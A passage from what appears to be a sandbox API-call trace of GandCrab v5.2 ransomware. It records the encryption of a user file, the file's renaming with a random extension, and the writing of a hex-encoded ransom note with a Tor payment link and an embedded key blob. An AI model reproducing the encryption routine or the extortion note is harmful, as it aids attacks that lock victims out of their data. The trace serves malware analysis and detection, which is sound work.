VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.297] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\KZcK3fz60H0aS.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\kzck3fz60h0as.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0070.297] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.297] ReadFile (in: hFile=0x2b4, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0070.297] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.298] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.298] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4cdb38) returned 1 [0070.298] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0070.298] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0070.298] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0070.298] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0070.299] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.299] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.299] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.299] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.299] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4cdb38) returned 1 [0070.299] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0070.300] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0070.300] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0070.300] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0070.300] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.300] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.300] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.300] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.301] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4cdb38) returned 1 [0070.301] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.301] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503278) returned 1 [0070.301] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.301] CryptGetKeyParam (in: hKey=0x503278, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0070.301] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.301] CryptEncrypt (in: hKey=0x503278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259f130*=0x100) returned 1 [0070.302] GetLastError () returned 0x0 [0070.302] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.302] CryptDestroyKey (hKey=0x503278) returned 1 [0070.302] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.302] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.302] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.302] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4cdb38) returned 1 [0070.303] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.303] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5037f8) returned 1 [0070.303] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.303] CryptGetKeyParam (in: hKey=0x5037f8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0070.303] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.303] CryptEncrypt (in: hKey=0x5037f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259f130*=0x100) returned 1 [0070.303] GetLastError () returned 0x0 [0070.303] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.303] CryptDestroyKey (hKey=0x5037f8) returned 1 [0070.304] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.304] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.304] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0070.304] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0070.304] ReadFile (in: hFile=0x2b4, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259f1dc*=0xa1b3, lpOverlapped=0x0) returned 1 [0070.311] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xffff5e4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.311] WriteFile (in: hFile=0x2b4, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0xa1b3, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259f1c0*=0xa1b3, lpOverlapped=0x0) returned 1 [0070.313] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.313] WriteFile (in: hFile=0x2b4, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0070.316] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.320] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.320] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.320] CloseHandle (hObject=0x2b4) returned 1 [0070.322] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\KZcK3fz60H0aS.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\kzck3fz60h0as.mp3"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\KZcK3fz60H0aS.mp3.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\kzck3fz60h0as.mp3.titwmvjl"), dwFlags=0x1) returned 1 [0070.322] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.323] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0070.323] lstrcmpW (lpString1="Macromedia", lpString2=".") returned 1 [0070.323] lstrcmpW (lpString1="Macromedia", lpString2="..") returned 1 [0070.323] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="Macromedia" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia" [0070.323] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\" [0070.323] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0070.323] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.323] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0070.323] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.323] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0070.323] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.324] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0070.324] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.324] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0070.324] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.324] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.324] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\\\TITWMVJL-DECRYPT.txt") returned 70 [0070.324] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\macromedia\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0070.324] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\